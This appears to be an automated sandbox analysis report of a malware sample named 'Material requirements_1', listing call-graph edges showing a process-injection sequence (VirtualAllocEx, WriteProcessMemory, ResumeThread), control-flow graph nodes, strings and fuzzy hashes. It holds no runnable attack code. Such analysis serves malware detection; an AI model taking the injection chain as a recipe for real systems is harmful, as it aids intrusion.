41039 4da0622 ReadProcessMemory 41036->41039 41037 4da29ef 41038->41037 41039->41037 41041 4da23d4 41040->41041 41043 4da0538 WriteProcessMemory 41041->41043 41044 4da0532 WriteProcessMemory 41041->41044 41042 4da2904 41043->41042 41044->41042 41046 4da2209 41045->41046 41046->40957 41048 4da0628 ReadProcessMemory 41046->41048 41049 4da0622 ReadProcessMemory 41046->41049 41047 4da29ef 41048->41047 41049->41047 41051 4da20dc 41050->41051 41052 4da0478 VirtualAllocEx 41051->41052 41053 4da0472 VirtualAllocEx 41051->41053 41052->41051 41053->41051 41055 4da227d 41054->41055 41056 4da229e 41055->41056 41057 4da0538 WriteProcessMemory 41055->41057 41058 4da0532 WriteProcessMemory 41055->41058 41056->40957 41057->41056 41058->41056 41060 4da20dc 41059->41060 41061 4da0478 VirtualAllocEx 41060->41061 41062 4da0472 VirtualAllocEx 41060->41062 41061->41060 41062->41060 41064 4da0673 ReadProcessMemory 41063->41064 41066 4da06b7 41064->41066 41066->40993 41068 4da0673 ReadProcessMemory 41067->41068 41070 4da06b7 41068->41070 41070->40993 41072 4da0580 WriteProcessMemory 41071->41072 41074 4da05d7 41072->41074 41074->40997 41076 4da0580 WriteProcessMemory 41075->41076 41078 4da05d7 41076->41078 41078->40997 41080 712ff10 ResumeThread 41079->41080 41082 712ff41 41080->41082 41082->41003 41084 712ff10 ResumeThread 41083->41084 41086 712ff41 41084->41086 41086->41003 41088 4da0849 41087->41088 41088->41088 41089 4da09ae CreateProcessA 41088->41089 41090 4da0a0b 41089->41090 41090->41090 41092 4da0792 41091->41092 41093 4da07bb CreateProcessA 41091->41093 41092->40957 41095 4da0a0b 41093->41095 41095->41095 41097 4da04b8 VirtualAllocEx 41096->41097 41099 4da04f5 41097->41099 41099->41027 41101 4da04b8 VirtualAllocEx 41100->41101 41103 4da04f5 41101->41103 41103->41027 41190 2d04668 41191 2d0467a 41190->41191 41192 2d04686 41191->41192 41194 2d04779 41191->41194 41195 2d0479d 41194->41195 41199 2d04888 41195->41199 41203 2d04879 41195->41203 41200 2d048af 41199->41200 41201 2d0498c 41200->41201 41207 2d044c4 41200->41207 41205 2d04888 41203->41205 41204 2d0498c 41204->41204 41205->41204 41206 2d044c4 CreateActCtxA 41205->41206 41206->41204 41208 2d05918 CreateActCtxA 41207->41208 41210 2d059db 41208->41210 41127 136d01c 41128 136d034 41127->41128 41129 136d08e 41128->41129 41132 5322818 41128->41132 41137 5322808 41128->41137 41134 5322845 41132->41134 41133 5322877 41134->41133 41142 5322991 41134->41142 41147 53229a0 41134->41147 41138 5322818 41137->41138 41139 5322877 41138->41139 41140 53229a0 4 API calls 41138->41140 41141 5322991 4 API calls 41138->41141 41140->41139 41141->41139 41144 53229a0 41142->41144 41143 5322a40 41143->41133 41152 5322a58 41144->41152 41155 5322a48 41144->41155 41149 53229b4 41147->41149 41148 5322a40 41148->41133 41150 5322a58 4 API calls 41149->41150 41151 5322a48 4 API calls 41149->41151 41150->41148 41151->41148 41153 5322a69 41152->41153 41159 5324013 41152->41159 41153->41143 41156 5322a58 41155->41156 41157 5322a69 41156->41157 41158 5324013 4 API calls 41156->41158 41157->41143 41158->41157 41165 5324030 41159->41165 41169 5323fe8 41159->41169 41173 5323f54 41159->41173 41177 5324040 41159->41177 41160 532402a 41160->41153 41166 5324040 41165->41166 41167 53240da CallWindowProcW 41166->41167 41168 5324089 41166->41168 41167->41168 41168->41160 41171 5323ff4 41169->41171 41170 53240da CallWindowProcW 41172 5324089 41170->41172 41171->41160 41171->41170 41171->41172 41172->41160 41174 5323f86 41173->41174 41174->41160 41175 53240da CallWindowProcW 41174->41175 41176 5324089 41174->41176 41175->41176 41176->41160 41178 532405e 41177->41178 41179 53240da CallWindowProcW 41178->41179 41180 5324089 41178->41180 41179->41180 41180->41160 41181 4da2df0 41182 4da2f7b 41181->41182 41183 4da2e16 41181->41183 41183->41182 41186 4da3069 PostMessageW 41183->41186 41188 4da3070 PostMessageW 41183->41188 41187 4da30dc 41186->41187 41187->41183 41189 4da30dc 41188->41189 41189->41183

                        Executed Functions

                        Function 07120D8A Relevance: 4.1, Strings: 3, Instructions: 389COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 294 7120d8a-7120d8c 295 7120d8e-7120d9b 294->295 296 7120e0d-7120e64 294->296 295->296 297 7120e71-7120e90 296->297 298 7120e66-7120e68 296->298 301 7120e92 297->301 302 7120e94-7120f25 297->302 299 7120e6a-7120e6c 298->299 300 7120e6f-7120e70 298->300 299->300 300->297 301->302 306 7120f27 302->306 307 7120f2c-7120f68 302->307 306->307 374 7120f6a call 71214a3 307->374 375 7120f6a call 71214b0 307->375 309 7120f70-7120f72 310 7120f75 309->310 311 7120f7c-7120f98 310->311 312 7120fa1-7120fa2 311->312 313 7120f9a 311->313 319 71212d9-71212e0 312->319 313->310 313->312 314 71210b2-71210b6 313->314 315 7121116-7121123 313->315 316 7120ff6-7121022 313->316 317 7121158-712115c 313->317 318 7121058-7121078 313->318 313->319 320 712121e-712122a 313->320 321 712103e-7121053 313->321 322 712107d-7121086 313->322 323 7121202-7121219 313->323 324 7120fe2-7120ff4 313->324 325 71210e2-71210ee 313->325 326 71211a1-71211ad 313->326 327 7120fa7-7120fcc 313->327 328 7121027-7121039 313->328 329 71211cb-71211d7 313->329 330 7121188-712119c 313->330 331 7121128-712112c 313->331 332 7120fce-7120fe0 313->332 333 71212ac-71212b8 313->333 342 71210b8-71210c7 314->342 343 71210c9-71210d0 314->343 315->311 316->311 350 712115e-712116d 317->350 351 712116f-7121176 317->351 318->311 344 7121231-7121247 320->344 345 712122c 320->345 321->311 340 7121088-7121097 322->340 341 7121099-71210a0 322->341 323->311 324->311 346 71210f0 325->346 347 71210f5-7121111 325->347 334 71211b4-71211c6 326->334 335 71211af 326->335 327->311 328->311 338 71211d9 329->338 339 71211de-71211fd 329->339 330->311 348 712112e-712113d 331->348 349 712113f-7121146 331->349 332->311 336 71212ba 333->336 337 71212bf-71212d4 333->337 334->311 335->334 336->337 337->311 338->339 339->311 353 71210a7-71210ad 340->353 341->353 354 71210d7-71210dd 342->354 343->354 365 7121249 344->365 366 712124e-7121264 344->366 345->344 346->347 347->311 355 712114d-7121153 348->355 349->355 357 712117d-7121183 350->357 351->357 353->311 354->311 355->311 357->311 365->366 368 7121266 366->368 369 712126b-7121281 366->369 368->369 371 7121283 369->371 372 7121288-71212a7 369->372 371->372 372->311 374->309 375->309
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091392587.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7120000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID: 0%p1$0%p1$0%p1
                        • API String ID: 0-1740658550
                        • Opcode ID: ac25bec91c568bf1e4c591219c161eb4c9734baacf8408e9b81651c8d09a767e
                        • Instruction ID: bbb3ed1be3dae5615fef50c66e61d6e300f42faa3b1bc86ee3391b535853fab5
                        • Opcode Fuzzy Hash: ac25bec91c568bf1e4c591219c161eb4c9734baacf8408e9b81651c8d09a767e
                        • Instruction Fuzzy Hash: B2F1BFB190925ADFCB09CFA8C4804EEFFB1FF4A310B248595E441AB255D334AA93DF90
                        Function 07120E10 Relevance: 4.1, Strings: 3, Instructions: 379COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 376 7120e10-7120e64 377 7120e71-7120e90 376->377 378 7120e66-7120e68 376->378 381 7120e92 377->381 382 7120e94-7120f25 377->382 379 7120e6a-7120e6c 378->379 380 7120e6f-7120e70 378->380 379->380 380->377 381->382 386 7120f27 382->386 387 7120f2c-7120f68 382->387 386->387 454 7120f6a call 71214a3 387->454 455 7120f6a call 71214b0 387->455 389 7120f70-7120f72 390 7120f75 389->390 391 7120f7c-7120f98 390->391 392 7120fa1-7120fa2 391->392 393 7120f9a 391->393 399 71212d9-71212e0 392->399 393->390 393->392 394 71210b2-71210b6 393->394 395 7121116-7121123 393->395 396 7120ff6-7121022 393->396 397 7121158-712115c 393->397 398 7121058-7121078 393->398 393->399 400 712121e-712122a 393->400 401 712103e-7121053 393->401 402 712107d-7121086 393->402 403 7121202-7121219 393->403 404 7120fe2-7120ff4 393->404 405 71210e2-71210ee 393->405 406 71211a1-71211ad 393->406 407 7120fa7-7120fcc 393->407 408 7121027-7121039 393->408 409 71211cb-71211d7 393->409 410 7121188-712119c 393->410 411 7121128-712112c 393->411 412 7120fce-7120fe0 393->412 413 71212ac-71212b8 393->413 422 71210b8-71210c7 394->422 423 71210c9-71210d0 394->423 395->391 396->391 430 712115e-712116d 397->430 431 712116f-7121176 397->431 398->391 424 7121231-7121247 400->424 425 712122c 400->425 401->391 420 7121088-7121097 402->420 421 7121099-71210a0 402->421 403->391 404->391 426 71210f0 405->426 427 71210f5-7121111 405->427 414 71211b4-71211c6 406->414 415 71211af 406->415 407->391 408->391 418 71211d9 409->418 419 71211de-71211fd 409->419 410->391 428 712112e-712113d 411->428 429 712113f-7121146 411->429 412->391 416 71212ba 413->416 417 71212bf-71212d4 413->417 414->391 415->414 416->417 417->391 418->419 419->391 433 71210a7-71210ad 420->433 421->433 434 71210d7-71210dd 422->434 423->434 445 7121249 424->445 446 712124e-7121264 424->446 425->424 426->427 427->391 435 712114d-7121153 428->435 429->435 437 712117d-7121183 430->437 431->437 433->391 434->391 435->391 437->391 445->446 448 7121266 446->448 449 712126b-7121281 446->449 448->449 451 7121283 449->451 452 7121288-71212a7 449->452 451->452 452->391 454->389 455->389
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091392587.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7120000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID: 0%p1$0%p1$0%p1
                        • API String ID: 0-1740658550
                        • Opcode ID: ef319aa1aa2e26f4bdec4a706a679e892870ada38d886d1aea53a7ae747444dc
                        • Instruction ID: cc90187217e36cc379f56d0fc99b10fe5025fcd9078068fb00c63fc55b3c2107
                        • Opcode Fuzzy Hash: ef319aa1aa2e26f4bdec4a706a679e892870ada38d886d1aea53a7ae747444dc
                        • Instruction Fuzzy Hash: CEF1AEB190925ADFCB08CFA9C4804EEFFB1FF4A311B248595E441AB255D734AA93DF90
                        Function 07120F00 Relevance: 4.0, Strings: 3, Instructions: 278COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 456 7120f00-7120f25 457 7120f27 456->457 458 7120f2c-7120f68 456->458 457->458 525 7120f6a call 71214a3 458->525 526 7120f6a call 71214b0 458->526 460 7120f70-7120f72 461 7120f75 460->461 462 7120f7c-7120f98 461->462 463 7120fa1-7120fa2 462->463 464 7120f9a 462->464 470 71212d9-71212e0 463->470 464->461 464->463 465 71210b2-71210b6 464->465 466 7121116-7121123 464->466 467 7120ff6-7121022 464->467 468 7121158-712115c 464->468 469 7121058-7121078 464->469 464->470 471 712121e-712122a 464->471 472 712103e-7121053 464->472 473 712107d-7121086 464->473 474 7121202-7121219 464->474 475 7120fe2-7120ff4 464->475 476 71210e2-71210ee 464->476 477 71211a1-71211ad 464->477 478 7120fa7-7120fcc 464->478 479 7121027-7121039 464->479 480 71211cb-71211d7 464->480 481 7121188-712119c 464->481 482 7121128-712112c 464->482 483 7120fce-7120fe0 464->483 484 71212ac-71212b8 464->484 493 71210b8-71210c7 465->493 494 71210c9-71210d0 465->494 466->462 467->462 501 712115e-712116d 468->501 502 712116f-7121176 468->502 469->462 495 7121231-7121247 471->495 496 712122c 471->496 472->462 491 7121088-7121097 473->491 492 7121099-71210a0 473->492 474->462 475->462 497 71210f0 476->497 498 71210f5-7121111 476->498 485 71211b4-71211c6 477->485 486 71211af 477->486 478->462 479->462 489 71211d9 480->489 490 71211de-71211fd 480->490 481->462 499 712112e-712113d 482->499 500 712113f-7121146 482->500 483->462 487 71212ba 484->487 488 71212bf-71212d4 484->488 485->462 486->485 487->488 488->462 489->490 490->462 504 71210a7-71210ad 491->504 492->504 505 71210d7-71210dd 493->505 494->505 516 7121249 495->516 517 712124e-7121264 495->517 496->495 497->498 498->462 506 712114d-7121153 499->506 500->506 508 712117d-7121183 501->508 502->508 504->462 505->462 506->462 508->462 516->517 519 7121266 517->519 520 712126b-7121281 517->520 519->520 522 7121283 520->522 523 7121288-71212a7 520->523 522->523 523->462 525->460 526->460
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091392587.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7120000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID: 0%p1$0%p1$0%p1
                        • API String ID: 0-1740658550
                        • Opcode ID: a7a339bfe18e6a59fe3d159bc2280b5b245f10036d39e9fc3ad5fc56d5182d8b
                        • Instruction ID: 8082b24973a9fa1a6c83c9a60817d6b1432c5be049d3ced7875748ac6be774af
                        • Opcode Fuzzy Hash: a7a339bfe18e6a59fe3d159bc2280b5b245f10036d39e9fc3ad5fc56d5182d8b
                        • Instruction Fuzzy Hash: 22C17EB0E1521ADFCB08CFA9C4804AEFBB2FF89301F21D559E401AB254C734AA52DF94
                        Function 05326F40 Relevance: 3.4, Strings: 2, Instructions: 858COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 554 5326f40-5326f6b 555 5326f72-53272cb call 5326b18 call 5326bb4 * 3 call 5326bc4 call 5326bd4 call 5326be4 call 5326bf4 554->555 556 5326f6d 554->556 598 53272d2-53272e3 555->598 599 53272cd 555->599 556->555 600 53272e5 598->600 601 53272ea-53272f9 598->601 599->598 600->601 602 5327352-5327363 601->602 603 5327365-53274e1 602->603 604 53272fb-5327308 602->604 622 5327b7d-5327b96 603->622 605 532730a 604->605 606 532730f-5327321 604->606 605->606 608 5327323 606->608 609 5327328-532733e 606->609 608->609 610 5327340 609->610 611 5327345-532734f 609->611 610->611 611->602 623 53274e6-5327506 622->623 624 5327b9c-5327eab call 5326c74 call 2d0eba3 call 5326c84 * 2 call 5326c94 call 5326c84 622->624 625 5327538-5327568 623->625 699 5327eb2-5327f9e call 5326ca4 624->699 700 5327ead 624->700 629 5327572 625->629 630 532756a 625->630 633 5327577-532758c 629->633 630->629 632 532756c-5327570 630->632 632->633 635 5327592-532765d 633->635 636 5327508-5327527 633->636 653 53276a5-53276cb 635->653 654 532765f-532768a 635->654 638 5327532 636->638 639 5327529-5327530 636->639 638->625 639->635 658 53276d1-5327760 call 5326c04 call 5326c14 653->658 655 5327691-53276a3 654->655 656 532768c 654->656 655->658 656->655 672 532776a-5327781 658->672 674 5327762-5327769 672->674 675 5327783-5327795 call 5326c24 672->675 674->672 679 532779a-532781a 675->679 691 5327829 679->691 692 532781c-5327828 679->692 691->622 692->691 710 5327fa9-5328152 call 5326c94 call 5326cb4 call 5326cc4 call 5326cd4 call 5326ce4 call 5326cf4 call 5326bd4 call 5326d04 * 2 699->710 700->699
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088519663.0000000005320000.00000040.00000800.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5320000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID: Pp]q$Te]q
                        • API String ID: 0-2891114514
                        • Opcode ID: 4b634f176863cea5f2221229e91d2e5bc74ff73ef2ef585f7161f4a451fe11f8
                        • Instruction ID: 2d049613ee47ec6d78f9b07cf9ec29a17c067a58200256c496916d4296c7ac04
                        • Opcode Fuzzy Hash: 4b634f176863cea5f2221229e91d2e5bc74ff73ef2ef585f7161f4a451fe11f8
                        • Instruction Fuzzy Hash: AC929374A016298FDB64EF69C998ADDB7B2FF89300F1085E9D409A7365DB309E85CF40
                        Function 05326F1F Relevance: 1.9, Strings: 1, Instructions: 642COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 880 5326f1f-5326f6b 881 5326f72-5327021 880->881 882 5326f6d 880->882 887 532702b-5327037 call 5326b18 881->887 882->881 889 532703c-5327053 887->889 891 532705d-5327069 call 5326bb4 889->891 893 532706e-532714d call 5326bb4 * 2 891->893 907 5327154-5327160 893->907 908 5327168-53271f9 call 5326bc4 call 5326bd4 907->908 914 5327203-532721d call 5326be4 908->914 916 5327222-53272cb call 5326bf4 914->916 924 53272d2-53272e3 916->924 925 53272cd 916->925 926 53272e5 924->926 927 53272ea-53272f9 924->927 925->924 926->927 928 5327352-5327363 927->928 929 5327365-53274e1 928->929 930 53272fb-5327308 928->930 948 5327b7d-5327b96 929->948 931 532730a 930->931 932 532730f-5327321 930->932 931->932 934 5327323 932->934 935 5327328-532733e 932->935 934->935 936 5327340 935->936 937 5327345-532734f 935->937 936->937 937->928 949 53274e6-5327506 948->949 950 5327b9c-5327bb0 948->950 951 5327538-5327568 949->951 952 5327bb5-5327bc4 call 5326c74 950->952 955 5327572 951->955 956 532756a 951->956 957 5327bc9-5327c0f 952->957 959 5327577-532758c 955->959 956->955 958 532756c-5327570 956->958 969 5327c19-5327c42 call 2d0eba3 call 5326c84 957->969 958->959 961 5327592-5327597 959->961 962 5327508-5327527 959->962 966 53275a1-53275b0 961->966 964 5327532 962->964 965 5327529-5327530 962->965 964->951 965->961 968 53275bb-532765d 966->968 979 53276a5-53276cb 968->979 980 532765f-532768a 968->980 974 5327c47-5327e52 call 5326c84 call 5326c94 call 5326c84 969->974 1021 5327e59-5327e6b 974->1021 984 53276d1-53276ea call 5326c04 979->984 981 5327691-53276a3 980->981 982 532768c 980->982 981->984 982->981 988 53276ef-53276ff 984->988 990 5327709-5327760 call 5326c14 988->990 998 532776a-5327781 990->998 1000 5327762-5327769 998->1000 1001 5327783-5327795 call 5326c24 998->1001 1000->998 1005 532779a-532781a 1001->1005 1017 5327829 1005->1017 1018 532781c-5327828 1005->1018 1017->948 1018->1017 1022 5327e77-5327e83 1021->1022 1023 5327e8d-5327e95 1022->1023 1024 5327e9b-5327eab 1023->1024 1025 5327eb2-5327f75 call 5326ca4 1024->1025 1026 5327ead 1024->1026 1035 5327f80-5327f9e 1025->1035 1026->1025 1036 5327fa9-5328152 call 5326c94 call 5326cb4 call 5326cc4 call 5326cd4 call 5326ce4 call 5326cf4 call 5326bd4 call 5326d04 * 2 1035->1036
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088519663.0000000005320000.00000040.00000800.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5320000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID: Pp]q
                        • API String ID: 0-2528107101
                        • Opcode ID: f7ab16fce0d04620c6a48e199895fbf494de362b9abd823845fb2bcdcc9e4221
                        • Instruction ID: 715f6449825db593dfbb9086f2345686b2b8bd04af1762bfda049fed94f7e3e5
                        • Opcode Fuzzy Hash: f7ab16fce0d04620c6a48e199895fbf494de362b9abd823845fb2bcdcc9e4221
                        • Instruction Fuzzy Hash: B862A634A016298FDB54EF65C898ADDB7B2FF89300F1185E9D809AB365DB319E85CF40
                        Function 0532782C Relevance: 1.8, Strings: 1, Instructions: 519COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1064 532782c-532784b 1065 5327852-5327b28 call 5326c34 call 5326c44 call 5326c54 call 5326c64 1064->1065 1066 532784d 1064->1066 1098 5327b2a 1065->1098 1099 5327b2f-5327b3d 1065->1099 1066->1065 1098->1099 1100 5327b44-5327b6e 1099->1100 1101 5327b3f 1099->1101 1102 5327b70 1100->1102 1103 5327b75-5327b7a 1100->1103 1101->1100 1102->1103 1104 5327b7d-5327b96 1103->1104 1105 53274e6-5327506 1104->1105 1106 5327b9c-5327eab call 5326c74 call 2d0eba3 call 5326c84 * 2 call 5326c94 call 5326c84 1104->1106 1107 5327538-5327568 1105->1107 1181 5327eb2-5327f9e call 5326ca4 1106->1181 1182 5327ead 1106->1182 1111 5327572 1107->1111 1112 532756a 1107->1112 1115 5327577-532758c 1111->1115 1112->1111 1114 532756c-5327570 1112->1114 1114->1115 1117 5327592-532765d 1115->1117 1118 5327508-5327527 1115->1118 1135 53276a5-53276cb 1117->1135 1136 532765f-532768a 1117->1136 1120 5327532 1118->1120 1121 5327529-5327530 1118->1121 1120->1107 1121->1117 1140 53276d1-5327760 call 5326c04 call 5326c14 1135->1140 1137 5327691-53276a3 1136->1137 1138 532768c 1136->1138 1137->1140 1138->1137 1154 532776a-5327781 1140->1154 1156 5327762-5327769 1154->1156 1157 5327783-5327795 call 5326c24 1154->1157 1156->1154 1161 532779a-532781a 1157->1161 1173 5327829 1161->1173 1174 532781c-5327828 1161->1174 1173->1104 1174->1173 1192 5327fa9-5328152 call 5326c94 call 5326cb4 call 5326cc4 call 5326cd4 call 5326ce4 call 5326cf4 call 5326bd4 call 5326d04 * 2 1181->1192 1182->1181
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088519663.0000000005320000.00000040.00000800.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5320000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID: Pp]q
                        • API String ID: 0-2528107101
                        • Opcode ID: 4dcfe3a6d10a0e728766cdf8d9655ee353fc80299ab4177c096d7e46d8324ebb
                        • Instruction ID: e61090ca1515da1ca289269c8fdb7bdbb54f5a4f5b7fe5f2c98c291d32fa3af3
                        • Opcode Fuzzy Hash: 4dcfe3a6d10a0e728766cdf8d9655ee353fc80299ab4177c096d7e46d8324ebb
                        • Instruction Fuzzy Hash: 18428334A01269CFCB65EF64C998A9DB7B2FF89301F5081E9D409A7365DB31AE85CF40
                        Function 07124548 Relevance: 1.5, Strings: 1, Instructions: 243COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091392587.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7120000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID: 7{f'
                        • API String ID: 0-2192695807
                        • Opcode ID: ed4ddc4229ec776adfea20f24d2d48864f6745701c61227bf8d207ecbad787dd
                        • Instruction ID: 675d052086580d61ff6e94f77ac85ceed7728a5b32ca9a9a245214599a2ff48d
                        • Opcode Fuzzy Hash: ed4ddc4229ec776adfea20f24d2d48864f6745701c61227bf8d207ecbad787dd
                        • Instruction Fuzzy Hash: F3A12BB0E16259DFCB08CFD5D681ADDFBB2FB8A300F20A416E805B7294D7349D169B14
                        Function 07124538 Relevance: 1.5, Strings: 1, Instructions: 238COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091392587.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7120000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID: 7{f'
                        • API String ID: 0-2192695807
                        • Opcode ID: c7362c0afcf6db946927a306ec10ac76d2d920857c6aa0baa11125835331b438
                        • Instruction ID: 04ac3522772d370466a71f926afa28c8acee0f58ba381e3e1c2369de7f4b7f1b
                        • Opcode Fuzzy Hash: c7362c0afcf6db946927a306ec10ac76d2d920857c6aa0baa11125835331b438
                        • Instruction Fuzzy Hash: D0A13DB0E16259DFCB08CFE5D681A9DFBB2FB89300F24A416E805B7294D7349D16DB14
                        Function 07124210 Relevance: 1.5, Strings: 1, Instructions: 212COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091392587.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7120000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID: Z
                        • API String ID: 0-1862792848
                        • Opcode ID: 470d2fad2f4536b2a9696db30a01ced1cbce0fba3c90679d4fae90dea5dbaa82
                        • Instruction ID: 99f3b45d945b106e0ba332206646ddfdba1969cb084f0412e1810c77c5d449c7
                        • Opcode Fuzzy Hash: 470d2fad2f4536b2a9696db30a01ced1cbce0fba3c90679d4fae90dea5dbaa82
                        • Instruction Fuzzy Hash: AB913AB4E15269CFCB08DF99D8809EEFBB1FF89200F109519D815B7258D7359912CF94
                        Function 07124201 Relevance: 1.5, Strings: 1, Instructions: 206COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091392587.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7120000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID: Z
                        • API String ID: 0-1862792848
                        • Opcode ID: 4351435b8d9f01d05ac8a00d9f4b6187d7abfa6b2783a4f5a4cb9d2ff3c3511a
                        • Instruction ID: 6994664c4c5bbfbeefc7e31bcd2a7e35e71c1f085c38025b44aba00840b4ef04
                        • Opcode Fuzzy Hash: 4351435b8d9f01d05ac8a00d9f4b6187d7abfa6b2783a4f5a4cb9d2ff3c3511a
                        • Instruction Fuzzy Hash: 838129B4E15269CFCB08DFA9D8809EEFBB2FF89200F10951AD815B7258D7359912CF94
                        Function 07123698 Relevance: .1, Instructions: 97COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091392587.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7120000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5cb28576de8607c019919ec5eaff4d4cc4985207e2f89189934408075a4c9afb
                        • Instruction ID: 61ea0a3bcbaec6fc76d12e1e9f5920872960c5dbdfef21b39454c1efb5f7c29d
                        • Opcode Fuzzy Hash: 5cb28576de8607c019919ec5eaff4d4cc4985207e2f89189934408075a4c9afb
                        • Instruction Fuzzy Hash: FB41E6B4E14508EFCB08CF5AE184899FBF2FF89200F56C0A5D858A7365DB35EA159B04
                        Function 0712368B Relevance: .1, Instructions: 93COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091392587.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7120000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f2492a177d18eaea10bd372a8c4b0a8822b93cec0ee19a4b973dc09bfb0a71c5
                        • Instruction ID: b10f9070fb1ac95993b063ca54303ad02f1f7bc2a477372b1bd24c56d7e3e9ce
                        • Opcode Fuzzy Hash: f2492a177d18eaea10bd372a8c4b0a8822b93cec0ee19a4b973dc09bfb0a71c5
                        • Instruction Fuzzy Hash: CD4106B4E10508EFCB08CF5AD184999FBF2FF89210F56C0D5D868AB265DB35EA15CB04
                        Function 07120006 Relevance: .1, Instructions: 80COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091392587.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7120000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 602b02da72cb0747b0cd1dc3f76cf2b18c22b8bcfc4b839cb66079754556bf75
                        • Instruction ID: 6db9d6f6c9d91f457cb0f3ad701cd72101c3973bd77a1c97e352c981ed1bbffa
                        • Opcode Fuzzy Hash: 602b02da72cb0747b0cd1dc3f76cf2b18c22b8bcfc4b839cb66079754556bf75
                        • Instruction Fuzzy Hash: 293142B1D053898FDB19CFA6C95429EBFB3AF8A310F18C0AAD444AA265DB740945CB50
                        Function 07120040 Relevance: .1, Instructions: 66COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091392587.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7120000_Material requirements_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9cfce62b35e9601e6e0a2d55f843475776b82f28abb320e4e88bb86b2aac496e
                        • Instruction ID: 754ba51f7737eb2ec554621e263c07167cac87c525018eb2d10572350507ef7e
                        • Opcode Fuzzy Hash: 9cfce62b35e9601e6e0a2d55f843475776b82f28abb320e4e88bb86b2aac496e
                        • Instruction Fuzzy Hash: 8621E7B1E006189BDB18CFABD9442DEFBF7AFC9310F14C16AD408A6268DB751A56CF50
                        Function 04DA07B6 Relevance: 1.8, APIs: 1, Instructions: 256processCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
